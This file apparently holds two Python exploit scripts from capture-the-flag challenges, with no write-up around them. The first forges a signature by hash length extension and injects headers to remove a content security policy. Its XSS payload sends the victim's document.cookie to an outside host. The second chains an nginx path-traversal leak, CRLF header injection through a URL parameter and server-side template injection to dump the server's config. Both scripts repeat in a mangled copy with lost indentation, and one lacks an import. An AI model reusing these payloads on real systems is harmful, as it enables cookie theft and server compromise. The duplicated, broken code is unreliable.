shpik-kr/csp.py

## csp.py
'''
1. hash length extension: Make multi query.
2. header injection: Remove CSP header, and XSS occur
'''

import hashpumpy
import requests

b64e = lambda x:x.encode('base64').replace('\n','')

h = '9324c43e76bdfb789eebe82870f2d1a8'
origin = 'aGVhZGVy,VmFyeQ==,Kg=='

payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'
add = '|'
add += b64e('header')+','+b64e('HTTP/1.1')+','+b64e('100 Continue')+'|'
add += b64e('body')+','+b64e('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\nContent-Length: '+str(len(payload))+'\r\n\r\n'+payload+'\r\n')+','+b64e('')+'|'

key_legnth = 12
new_hash,msg = hashpumpy.hashpump(h, origin, add, 12)
encoded = (msg).encode('base64').replace('\n','')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "110.10.147.166"
port = 80

print 'http://%s/api.php?sig=%s&q=%s'%(host, new_hash, encoded)

s.connect((host, port))
data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
Host: %s
'''%(new_hash, encoded, host)
s.send(data)

print `s.recv(1024)`
print `s.recv(1024)`
print `s.recv(1024)`

## renderer.py
'''
1. Nginx Misconfig: http://[domain]/static../, Leak source code.
2. CRLF: Send header for bypassing some condition about header.
3. SSTI: Read Log file as `render_template_string`.
'''

import requests

def write_log(payload):
	renderer = "http://110.10.147.169/renderer/"
	adminpage = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"

	data = {
		"url": adminpage
	}

	r = requests.post(renderer, data=data)
	aa = r.text
	a =  aa.split('ticket no ')[1].split('\n')[0]
	return a

def read_log(ticket):
	renderer = "http://110.10.147.169/renderer/"
	ticket_url = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"

	data = {
		"url": ticket_url
	}

	r = requests.post(renderer, data=data)
	print r.text

def file_check(ticket):
	print requests.get('http://110.10.147.169/static../tickets/'+ticket).text


payload = "{{config}}"
ticket = write_log(payload)
print 'ticket no', ticket
file_check(ticket)
read_log(ticket)
	'''
	1. hash length extension: Make multi query.
	2. header injection: Remove CSP header, and XSS occur
	'''

	import hashpumpy
	import requests

	b64e = lambda x:x.encode('base64').replace('\n','')

	h = '9324c43e76bdfb789eebe82870f2d1a8'
	origin = 'aGVhZGVy,VmFyeQ==,Kg=='

	payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'
	add = '\|'
	add += b64e('header')+','+b64e('HTTP/1.1')+','+b64e('100 Continue')+'\|'
	add += b64e('body')+','+b64e('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\nContent-Length: '+str(len(payload))+'\r\n\r\n'+payload+'\r\n')+','+b64e('')+'\|'

	key_legnth = 12
	new_hash,msg = hashpumpy.hashpump(h, origin, add, 12)
	encoded = (msg).encode('base64').replace('\n','')

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	host = "110.10.147.166"
	port = 80

	print 'http://%s/api.php?sig=%s&q=%s'%(host, new_hash, encoded)

	s.connect((host, port))
	data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
	Host: %s
	'''%(new_hash, encoded, host)
	s.send(data)

	print `s.recv(1024)`
	print `s.recv(1024)`
	print `s.recv(1024)`
	'''
	1. Nginx Misconfig: http://[domain]/static../, Leak source code.
	2. CRLF: Send header for bypassing some condition about header.
	3. SSTI: Read Log file as `render_template_string`.
	'''

	import requests

	def write_log(payload):
	renderer = "http://110.10.147.169/renderer/"
	adminpage = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"

	data = {
	"url": adminpage
	}

	r = requests.post(renderer, data=data)
	aa = r.text
	a = aa.split('ticket no ')[1].split('\n')[0]
	return a

	def read_log(ticket):
	renderer = "http://110.10.147.169/renderer/"
	ticket_url = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"

	data = {
	"url": ticket_url
	}

	r = requests.post(renderer, data=data)
	print r.text

	def file_check(ticket):
	print requests.get('http://110.10.147.169/static../tickets/'+ticket).text


	payload = "{{config}}"
	ticket = write_log(payload)
	print 'ticket no', ticket
	file_check(ticket)
	read_log(ticket)